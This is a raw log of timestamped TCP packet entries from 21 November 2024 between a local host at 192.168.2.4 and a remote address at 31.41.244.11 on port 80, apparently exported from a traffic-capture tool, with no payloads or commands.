                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.052535057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.053426981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.053486109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.054140091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.054200888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.054574966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.054629087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.054672003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.054730892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.055610895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.055668116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.055723906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.055775881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.056699038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.056755066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.056811094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.056864023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.057800055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.057852983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.057915926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.057969093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.059019089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.059072971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.059077024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.059129000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.059942961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.059993029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.213421106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.213475943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.213669062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.213900089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.213989973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.213999033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.214051008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.214946032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.215042114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.215070963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.215111971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.216017962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.216073990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.216084003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.216126919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.217150927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.217206955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.217212915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.217261076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.218194008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.218246937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.218317032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.218379021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.219333887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.219393015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.219397068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.219449997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.220370054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.220428944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.220468044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.220525026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.221503019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.221566916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.221633911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.221692085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.222568989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.222623110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.222704887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.222760916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.223645926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.223702908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.223772049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.223826885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.224745989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.224801064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.224874973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.224929094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.225837946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.225893974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.225959063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.226011038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.226918936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.226974964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.227118015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.227173090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.228030920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.228100061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.228123903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.228176117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.229120970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.229185104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.229237080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.229290009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.230165005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.230226040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.230290890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.230340958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.231338024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.231398106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.231436014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.231489897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.232353926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.232407093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.232456923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.232511044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.233443022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.233500004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.233562946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.233617067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.234708071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.234766960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.234802961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.234855890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.235696077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.235754013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.235820055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.235872984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.236726046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.236782074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.236841917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.236896038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.237926960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.237979889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.238044977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.238095999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.239115000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.239173889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.239273071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.239330053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.240073919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.240127087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.240185976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.240238905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.241081953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.241136074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.241180897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.241229057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.242172003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.242229939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.242299080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.242352009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.243338108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.243395090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.243443012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.243496895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.244347095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.244405985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.244501114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.244554996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.245783091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.245836973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.245842934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.245886087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.246618986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.246673107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.246673107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.246726990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.247625113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.247677088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.247729063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.247781992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.248704910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.248765945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.248785019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.248837948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.249785900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.249844074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.249914885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.249968052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.250863075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.250932932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.251030922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.251081944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.251960039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.252022028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.252084970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.252137899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.253067017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.253123045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.253184080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.253236055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.254172087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.254234076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.254429102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.254484892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.255264997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.255328894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.255404949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.255460978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.256320000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.256376028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.256449938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.256504059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.257400990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.257455111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.257529974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.257584095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.258487940 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.258543015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.258621931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.258675098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.259629011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.259685040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.259746075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.259799957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.260718107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.260811090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.260874987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.260937929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.261779070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.261848927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.261914968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.261972904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.262885094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.262974977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.263057947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.263123035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.263981104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.264056921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.264075994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.264127016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.265057087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.265130043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.265197039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.265249014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.266134024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.266227961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.266253948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.266305923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.267199993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.267266989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.267343998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.267396927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.268294096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.268358946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.268418074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.268467903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.269432068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.269494057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.269556999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.269610882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.270412922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.270478964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.423976898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.424057961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.424077034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.424114943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.424462080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.424526930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.424587965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.424643040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.425539017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.425594091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.425595045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.425646067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.426635981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.426685095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.426803112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.426866055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.427711964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:19.427766085 CET4977080192.168.2.431.41.244.11
